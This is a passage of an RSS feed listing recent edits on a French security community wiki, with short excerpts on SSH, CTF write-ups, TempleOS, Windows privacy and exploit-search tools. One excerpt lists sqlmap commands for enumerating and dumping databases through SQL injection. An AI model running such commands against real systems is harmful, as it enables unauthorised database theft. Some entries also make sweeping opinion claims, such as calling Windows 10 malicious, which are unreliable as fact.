        <description>Le sommaire a été déplace en page d'accueil : https://wiki.zenk-security.com/doku.php</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=sourceforge&amp;rev=1517096369&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-28T00:39:29+02:00</dc:date>
        <title>sourceforge</title>
        <link>http://wiki.zenk-security.com/doku.php?id=sourceforge&amp;rev=1517096369&amp;do=diff</link>
        <description>SourceForge est un site d'hébergement de logiciels. Commencé à la fin des années 1990, il était le site de projet logiciel le plus populaire avant que Git et CSV ne remplacent ces services Web. Sourceforge a été lancé en 1999 et offre à ses utilisateurs un référentiel pour le code, un outil de suivi des bogues, une liste de diffusion, un espace de blog et surtout un miroir pour les téléchargements des exécutables. Le modèle de revenus est basé sur des annonces publicitaire.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=sqlmap_usage&amp;rev=1572041887&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-26T00:18:07+02:00</dc:date>
        <title>sqlmap_usage</title>
        <link>http://wiki.zenk-security.com/doku.php?id=sqlmap_usage&amp;rev=1572041887&amp;do=diff</link>
        <description># Basic usage

./sqlmap.py -u “inject address” --dbs  enumerate database
./sqlmap.py -u “inject address” --current-db  current database
./sqlmap.py -u “inject address” --users  column database user
./sqlmap.py -u “inject address” --current-user  current user
./sqlmap.py -u “inject address” --tables -D “database”  enumerate the table name of the database
./sqlmap.py -u “inject address” --columns -T “table name” -D “database”  get the column name of the table
./sqlmap.py -u “inject address” --dump…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ssh&amp;rev=1509814395&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T17:53:15+02:00</dc:date>
        <title>ssh</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ssh&amp;rev=1509814395&amp;do=diff</link>
        <description>SSH (Secure Shell) est à la fois un programme informatique et un protocole de communication sécurisé. Le protocole de connexion impose un échange de clés de chiffrement en début de connexion. Par la suite, tous les segments TCP sont authentifiés et chiffrés. Il devient donc impossible d'utiliser un sniffer pour voir ce que fait l'utilisateur.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ssh_configuration&amp;rev=1535359090&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-08-27T10:38:10+02:00</dc:date>
        <title>ssh_configuration</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ssh_configuration&amp;rev=1535359090&amp;do=diff</link>
        <description>Une fois le serveur OpenSSH installé, ouvrez le fichier /etc/ssh/sshd_config et décommentez les lignes suivantes :


RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys


Redémarrez le serveur via la commande suivante :</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=stay_alive&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>stay_alive</title>
        <link>http://wiki.zenk-security.com/doku.php?id=stay_alive&amp;rev=1491744837&amp;do=diff</link>
        <description>Overview

Dans ce challenge, on nous fourni une application Windows Phone (qui est un paquet Silverlight).
Un paquet Silverlight est une archive au format ZIP avec l’extension .XAP.
Décompressez cette archive devrait vous donnez une multitude de fichier, ainsi qu'un appelé ndh_stay-alive.dll.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=stripe_ctf&amp;rev=1346268283&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-08-29T21:24:43+02:00</dc:date>
        <title>stripe_ctf</title>
        <link>http://wiki.zenk-security.com/doku.php?id=stripe_ctf&amp;rev=1346268283&amp;do=diff</link>
        <description>Enonce

	&quot;We'll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. 
It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes...
You can access the Secret Safe at &lt;https://level00-1.stripe-ctf.com/user-kfsvkinufw&gt;. 
The Safe's code is included below, and can also be obtained via git clone &lt;https://level00-1.stripe-ctf.com/user-kfsvkinufw/level00-code&gt;. &quot;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=suppression_de_logiciel_malveillant_windows&amp;rev=1509794410&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T12:20:10+02:00</dc:date>
        <title>suppression_de_logiciel_malveillant_windows</title>
        <link>http://wiki.zenk-security.com/doku.php?id=suppression_de_logiciel_malveillant_windows&amp;rev=1509794410&amp;do=diff</link>
        <description>Vous avez échoué à utiliser du bon sens, et maintenant votre ordinateur est infecté. Que faire ?

Une réponse

	*   Backup
	*  Reformaté
	*  Réinstallé

(Source: &lt;http://technet.microsoft.com/en-us/library/cc700813.aspx&gt;)

Mais si vous DEVEZ ...

Si vous avez des barres d'outils ou des add-ons répertoriés dans les programmes et les fonctionnalités, essayez de les désinstaller.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=techniques_de_nettoyage&amp;rev=1509793309&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T12:01:49+02:00</dc:date>
        <title>techniques_de_nettoyage</title>
        <link>http://wiki.zenk-security.com/doku.php?id=techniques_de_nettoyage&amp;rev=1509793309&amp;do=diff</link>
        <description>Écrans

Les écrans (y compris les téléphones) peuvent être nettoyés avec un chiffon en microfibres et de l'eau:

	*  Éteignez l'écran.
	*  Utilisé un flacon pulvérisateur et envoyer une légère brume sur une partie du chiffon.
	*  * Ne pas faire tremper le chiffon. Juste un peu d'humidité suffit.
	*  * Ne pas pulvériser de l'eau directement sur l'écran. L'eau pourrait rentrer et court-circuiter l'électronique.
	*  Effectuer des mouvements circulaires avec le chiffon pour nettoyer l'écran. Vous de…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=telechargement_et_installation_d_un_logiciel_de_virtualisation_virtualbox&amp;rev=1371197692&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-06-14T10:14:52+02:00</dc:date>
        <title>telechargement_et_installation_d_un_logiciel_de_virtualisation_virtualbox</title>
        <link>http://wiki.zenk-security.com/doku.php?id=telechargement_et_installation_d_un_logiciel_de_virtualisation_virtualbox&amp;rev=1371197692&amp;do=diff</link>
        <description>le lien pour télécharger le programme VirtualBox est : &lt;https://www.virtualbox.org/wiki/Downloads&gt;

La procédure d’installation sous windows est la suivante : 



Cliquez sur Next



Cliquez sur Next



Cliquez sur Next



Cliquez sur Yes



Cliquez sur Install</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=temple_os&amp;rev=1516583864&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-22T02:17:44+02:00</dc:date>
        <title>temple_os</title>
        <link>http://wiki.zenk-security.com/doku.php?id=temple_os&amp;rev=1516583864&amp;do=diff</link>
        <description>[Capture d'écran de TempleOS]

Temple OS, anciennement LoseThos, et plus récemment Sparrow OS, est un système d'exploitation conçu pour être un Temple de Jésus-Christ, développé par le schizophrène Terry A. Davis.

TempleOS est un système d'exploitation de PC x86_64, multitâche, multi-cœur, domaine public, open source, ring-0-uniquement, carte d'adresse unique (mappage d'identité), sans réseau, pour la programmation récréative. Il colle au matériel commun 64 bits au lieu de pilotes distincts.…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=terry_davis&amp;rev=1557666581&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-05-12T15:09:41+02:00</dc:date>
        <title>terry_davis</title>
        <link>http://wiki.zenk-security.com/doku.php?id=terry_davis&amp;rev=1557666581&amp;do=diff</link>
        <description>Terry A. Davis (15 décembre 1969 - 11 août 2018) est un schizophrène connu et a fait Temple OS dans une tentative de faire un temple du 21ème siècle à Dieu et à Jésus. En outre, il croit être capable de parler à Jésus via les ports nethost localhost du système.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=trouver_des_exploits_publique&amp;rev=1715950434&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-05-17T14:53:54+02:00</dc:date>
        <title>trouver_des_exploits_publique</title>
        <link>http://wiki.zenk-security.com/doku.php?id=trouver_des_exploits_publique&amp;rev=1715950434&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

offline :

	*  un outil comme searchsploit mais qui cherche sur exploit-db et &lt;https://github.com/nomi-sec/PoC-in-GitHub&gt; : &lt;https://github.com/usdAG/search_vulns&gt; 
	*  SearchSploit &lt;https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf&gt;
	*  -&gt; git clone &lt;https://github.com/offensive-security/exploit-database.git&gt;
	*  -&gt; apt update &amp;&amp; apt -y install exploitdb
	*  -&gt; searchsploit -u #upd…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ubuntu&amp;rev=1509842142&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T01:35:42+02:00</dc:date>
        <title>ubuntu</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ubuntu&amp;rev=1509842142&amp;do=diff</link>
        <description>[Logo Ubuntu]
[Le bureau par défaut dans Ubuntu]
 

 

 

 

 


Saveurs d’Ubuntu

[Le bureau par défaut dans Xubuntu ]
 

 

 

Les variantes officiellement reconnues d’Ubuntu sont les suivantes:

	*  Xubuntu utilise l’environnement de bureau Xfce.
	*  Lubuntu utilise l’environnement de bureau LXDE.
	*  Kubuntu utilise l’environnement de bureau KDE.
	*  Ubuntu GNOME utilise l’environnement de bureau GNOME.
	*  Ubuntu MATE utilise l’environnement de bureau MATE.
	*  Ubuntu Studio est conçu pour …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=une_liste_de_site_qui_font_des_audits_web_gratuitement&amp;rev=1589368207&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-05-13T13:10:07+02:00</dc:date>
        <title>une_liste_de_site_qui_font_des_audits_web_gratuitement</title>
        <link>http://wiki.zenk-security.com/doku.php?id=une_liste_de_site_qui_font_des_audits_web_gratuitement&amp;rev=1589368207&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

Outils gratuits

🛠  &lt;https://www.sqreen.com/scan&gt;

🛠 &lt;https://webcookies.org/&gt;

🛠 Pulsedive - scans of malicious URLs, IPs, and domains, including port scans and web requests. &lt;https://pulsedive.com/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=unicode_comme_canal_steganographique&amp;rev=1394896690&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-03-15T16:18:10+02:00</dc:date>
        <title>unicode_comme_canal_steganographique</title>
        <link>http://wiki.zenk-security.com/doku.php?id=unicode_comme_canal_steganographique&amp;rev=1394896690&amp;do=diff</link>
        <description>⚠‍͏ cette page utilise beaucoup de caractères que vous ne voyez potentiellement pas, n'hésitez pas à copier&amp;coller dans un terminal du texte echo -n 'texte' | hd  pour constater la présence d'octets invisibles ⚠‍͏

Qu'est-ce qu'Unicode ?

Unicode est le système utilisé pour numériser du texte aujourd'hui.
C'est le consortium unicode &lt;http://www.unicode.org/&gt; qui s'en occupe.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=vbs_script&amp;rev=1572001177&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:59:37+02:00</dc:date>
        <title>vbs_script</title>
        <link>http://wiki.zenk-security.com/doku.php?id=vbs_script&amp;rev=1572001177&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠[Test Design Studio](&lt;http://patterson-consulting.net/tds&gt;) :copyright: - A full IDE with static code analysis for Micro Focus Unified Functional Testing VBScript-based automated tests.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=wiki_communautaire&amp;rev=1734533650&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-18T15:54:10+02:00</dc:date>
        <title>wiki_communautaire</title>
        <link>http://wiki.zenk-security.com/doku.php?id=wiki_communautaire&amp;rev=1734533650&amp;do=diff</link>
        <description>Bonjour et bienvenue sur le wiki de la communauté Zenk-Security. Vous trouverez ci-dessous un sommaire des articles. Si vous souhaitez contribuer au wiki, merci de consulter la page expliquant son fonctionnement avant. Bonne visite !

Vous trouverez ici les différentes catégories disponibles pour le wiki ainsi que des ressouces intéressantes.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=windows&amp;rev=1565425739&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-08-10T10:28:59+02:00</dc:date>
        <title>windows</title>
        <link>http://wiki.zenk-security.com/doku.php?id=windows&amp;rev=1565425739&amp;do=diff</link>
        <description>Auditer la sécurité d un poste windows

&lt;https://pentestlab.blog/2017/04/24/windows-kernel-exploits/&gt;

Vérifier la sécurité d'une GPO

&lt;https://www.microsoft.com/en-us/download/details.aspx?id=55319&gt;

open scap

&lt;https://www.vutbr.cz/www_base/zav_prace_soubor_verejne.php?file_id=181284&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=windows_10&amp;rev=1509842709&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T01:45:09+02:00</dc:date>
        <title>windows_10</title>
        <link>http://wiki.zenk-security.com/doku.php?id=windows_10&amp;rev=1509842709&amp;do=diff</link>
        <description>[Windows 10 n'est pas votre ami ]

Il existe une forte probabilité que Windows 10 soit compromis. Ce système d'exploitation est malveillant, cela a été prouvé maintes et maintes fois non seulement qu'il datamine et vole des informations sur l'utilisateur, mais il a été conçu pour faire ceci. Installer Windows 10 à vos risques et périls.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=windows_7&amp;rev=1509842945&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T01:49:05+02:00</dc:date>
        <title>windows_7</title>
        <link>http://wiki.zenk-security.com/doku.php?id=windows_7&amp;rev=1509842945&amp;do=diff</link>
        <description>[Windows 7 logo]

Avec la sortie de Windows 10 sont venue des mises à jour pour Windows 7 (et 8/8.1) Microsoft a rajouté des spywares qu'il appelle des “fonctionnalités” pour faire de la télémétrie. Il est possible de désactivé tout ça grâce au script d'Aegis.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=writeups&amp;rev=1690468966&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2023-07-27T16:42:46+02:00</dc:date>
        <title>writeups</title>
        <link>http://wiki.zenk-security.com/doku.php?id=writeups&amp;rev=1690468966&amp;do=diff</link>
        <description>*  Newbie Contest
	*  RedTiger

	*  Exploit Exercises Protostar
	*  Nuit du Hack Public Wargame 2012
	*  Stripe CTF 2012
	*  CSAW CTF 2012 Quals
	*  29c3 CTF
	*  Overthewire.org Narnia

	*  Nullcon BattleUnderground
	*  Forbidden Bits
	*  CSAW CTF 2013 Quals</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=wysiwyg&amp;rev=1516572834&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-21T23:13:54+02:00</dc:date>
        <title>wysiwyg</title>
        <link>http://wiki.zenk-security.com/doku.php?id=wysiwyg&amp;rev=1516572834&amp;do=diff</link>
        <description>Les termes WYSIWYG (prononcé /wɪ.zi.wig/ ou /wi.zi.wig/) ou tel écran, tel écrit désignent en informatique une interface utilisateur qui permet de composer visuellement le résultat voulu, typiquement pour un logiciel de mise en page, un traitement de texte ou d’image. C'est une interface « intuitive » : l’utilisateur voit directement à l’écran à quoi ressemblera le résultat final.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=xss_reports&amp;rev=1593583790&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-07-01T08:09:50+02:00</dc:date>
        <title>xss_reports</title>
        <link>http://wiki.zenk-security.com/doku.php?id=xss_reports&amp;rev=1593583790&amp;do=diff</link>
        <description>Compilation de rapports XSS

&lt;https://hackerone.com/reports/485748&gt;

&lt;https://hackerone.com/reports/751870&gt;

&lt;https://hackerone.com/reports/438240&gt;

&lt;https://hackerone.com/reports/643908&gt;

&lt;https://hackerone.com/reports/840759&gt;

&lt;https://hackerone.com/reports/474656&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=youtube&amp;rev=1552318118&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-03-11T16:28:38+02:00</dc:date>
        <title>youtube</title>
        <link>http://wiki.zenk-security.com/doku.php?id=youtube&amp;rev=1552318118&amp;do=diff</link>
        <description>YouTube est un site web d’hébergement de vidéos, et un média social sur lequel les utilisateurs peuvent envoyer, regarder, commenter, évaluer et partager des vidéos. la plateforme et centralisée, propriétaire, applique une politique de censure et appartient a Google.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=yubikey_4_chiffrer_signer_ssh_github_tuto&amp;rev=1572352675&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-29T13:37:55+02:00</dc:date>
        <title>yubikey_4_chiffrer_signer_ssh_github_tuto</title>
        <link>http://wiki.zenk-security.com/doku.php?id=yubikey_4_chiffrer_signer_ssh_github_tuto&amp;rev=1572352675&amp;do=diff</link>
        <description>Hello,

Je me suis décidé à configurer ma Yubikey 4 qui prenait la poussière depuis quelques temps. Bon, je suis pas sur que le temps passé dessus en valait la chandelle mais c'est fait, du coup je vous fais un tuto pour utiliser une Yubikey 4 en tant que smartcard OpenPGP.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=zenk_roulettes&amp;rev=1405974176&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-07-21T22:22:56+02:00</dc:date>
        <title>zenk_roulettes</title>
        <link>http://wiki.zenk-security.com/doku.php?id=zenk_roulettes&amp;rev=1405974176&amp;do=diff</link>
        <description>*  Pixie CMS
	*  PluXml 5.0.1
	*  Alex Guestbook Version 5.0.2
	*  SoftBB 0.1.3
	*  Cacti 0.8.7g
	*  B2evolution Beta 4.0.0.1 
	*  Xoops 2.5.7</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=zeronet&amp;rev=1531604810&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-07-14T23:46:50+02:00</dc:date>
        <title>zeronet</title>
        <link>http://wiki.zenk-security.com/doku.php?id=zeronet&amp;rev=1531604810&amp;do=diff</link>
        <description>ZeroNet (ou ZeroNetwork) est un programme libre et open source qui connecte l'utilisateur qui l'exécute au réseau ZeroNet. ZeroNet est sous licence GPL version 2.0.(1)

ZeroNet a pour but d'offrir un accès Internet «gratuit et non censuré» (2) à tous. Il est écrit en python et est basé à Budapest, en Hongrie. Afin de rendre son Internet décentralisé, ZeroNet utilise la cryptographie bitcoin pour chiffrer les données et le réseau BitTorrent afin d'héberger des “zites”. Il n'est pas anonyme par dé…</description>
    </item>
</rdf:RDF>
